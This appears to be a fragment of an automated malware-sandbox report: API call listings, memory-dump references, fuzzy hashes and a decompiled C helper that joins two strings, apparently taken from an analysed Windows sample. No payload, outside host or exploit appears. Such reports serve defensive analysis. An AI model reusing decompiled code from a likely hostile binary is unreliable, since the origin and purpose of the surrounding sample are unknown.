                                                                                                                                                                                              0x00df6b9f
                                                                                                                                                                                              0x00df6ba3
                                                                                                                                                                                              0x00df6ba8
                                                                                                                                                                                              0x00df6bad
                                                                                                                                                                                              0x00df6bc7
                                                                                                                                                                                              0x00df6bb6
                                                                                                                                                                                              0x00df6bb6
                                                                                                                                                                                              0x00df6bba
                                                                                                                                                                                              0x00df6bbd
                                                                                                                                                                                              0x00df6bc2
                                                                                                                                                                                              0x00df6bc2
                                                                                                                                                                                              0x00df6bcc
                                                                                                                                                                                              0x00df6bf4
                                                                                                                                                                                              0x00df6bfa
                                                                                                                                                                                              0x00df6bfd
                                                                                                                                                                                              0x00df6bce
                                                                                                                                                                                              0x00df6bd0
                                                                                                                                                                                              0x00df6bd8
                                                                                                                                                                                              0x00df6be3
                                                                                                                                                                                              0x00df6be8
                                                                                                                                                                                              0x00df6be8
                                                                                                                                                                                              0x00df6c04
                                                                                                                                                                                              0x00df6c0b
                                                                                                                                                                                              0x00df6c0c
                                                                                                                                                                                              0x00df6c0c
                                                                                                                                                                                              0x00df6b9d
                                                                                                                                                                                              0x00df6c1c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00DFA006,?,?,?,?,00000102,00DF66AF,?,?,00000000), ref: 00DF6B7A
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                                • Part of subcall function 00DFA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DF6BA8,00000000,00000001,00000001,?,?,00DFA006,?,?,?,?,00000102), ref: 00DFA8E0
                                                                                                                                                                                                • Part of subcall function 00DFA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,00DFA006,?,?,?,?,00000102,00DF66AF,?,?,00000000,00000000), ref: 00DFA8EA
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DFA006,?,?,?,?,00000102,00DF66AF,?), ref: 00DF6BD8
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00DF6BE8
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00DF6BF4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3767559652-0
                                                                                                                                                                                              • Opcode ID: 318ed4b7eb5722522327436b04fb8a0f5980fda6ed9cf3f3bf050b6a7e9dcc81
                                                                                                                                                                                              • Instruction ID: 0f31f2b041f41880f1a5799a6bc701f241a209260df109e4a97d5b406fa5a644
                                                                                                                                                                                              • Opcode Fuzzy Hash: 318ed4b7eb5722522327436b04fb8a0f5980fda6ed9cf3f3bf050b6a7e9dcc81
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8221907250425DFFCB125FB8D944ABA7FA8EF05380B0AC054FA849B212DB75CA51D7B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t29 = lstrlenW(_a4);
                                                                                                                                                                                              				_t25 = lstrlenW(_a8);
                                                                                                                                                                                              				_t18 = E00DF58BE(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                              				_v8 = _t18;
                                                                                                                                                                                              				if(_t18 != 0) {
                                                                                                                                                                                              					_t34 = _t29 + _t29;
                                                                                                                                                                                              					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                              					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                              					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                              			}








                                                                                                                                                                                              0x00df5fe0
                                                                                                                                                                                              0x00df5fe4
                                                                                                                                                                                              0x00df5fee
                                                                                                                                                                                              0x00df5ff3
                                                                                                                                                                                              0x00df5ff8
                                                                                                                                                                                              0x00df5ffa
                                                                                                                                                                                              0x00df6002
                                                                                                                                                                                              0x00df6007
                                                                                                                                                                                              0x00df6015
                                                                                                                                                                                              0x00df601a
                                                                                                                                                                                              0x00df6024

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04C0937C,?,00DF694E,004F0053,04C0937C,?,?,?,?,?,?,00DF9C10), ref: 00DF5FDB
                                                                                                                                                                                              • lstrlenW.KERNEL32(00DF694E,?,00DF694E,004F0053,04C0937C,?,?,?,?,?,?,00DF9C10), ref: 00DF5FE2
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00DF694E,004F0053,04C0937C,?,?,?,?,?,?,00DF9C10), ref: 00DF6002
                                                                                                                                                                                              • memcpy.NTDLL(74B069A0,00DF694E,00000002,00000000,004F0053,74B069A0,?,?,00DF694E,004F0053,04C0937C), ref: 00DF6015
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2411391700-0
                                                                                                                                                                                              • Opcode ID: 90f83af5377b66ec60b897a1269c832156ef1151d084c704d2346a66d2478ae8
                                                                                                                                                                                              • Instruction ID: b74234879ae69910c947f739329fb0905a0dab03f29e0dc681ce44663d937988
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90f83af5377b66ec60b897a1269c832156ef1151d084c704d2346a66d2478ae8
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F0317690011CBB8F119FA8CC45C9F7BACEF082547158066BA04D7205E675DA109BF0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00DF5335,616D692F,00000000), ref: 00DF9DFB
                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00DF9E03
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00DF9E1A
                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00DF9E25
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 74227042-0
                                                                                                                                                                                              • Opcode ID: a435d3c7321845133508c577e6bbd92fa31bd8603c7569d05a5939c0ff256a1c
                                                                                                                                                                                              • Instruction ID: f8195e19d308a28b499777aca36c7692d957f85beb1f59296c0411a5bd76fa29
                                                                                                                                                                                              • Opcode Fuzzy Hash: a435d3c7321845133508c577e6bbd92fa31bd8603c7569d05a5939c0ff256a1c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E01233915725AB8722ABA4AD08C6FBBA9FF893507058915F654D3224CB31C825CBF1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%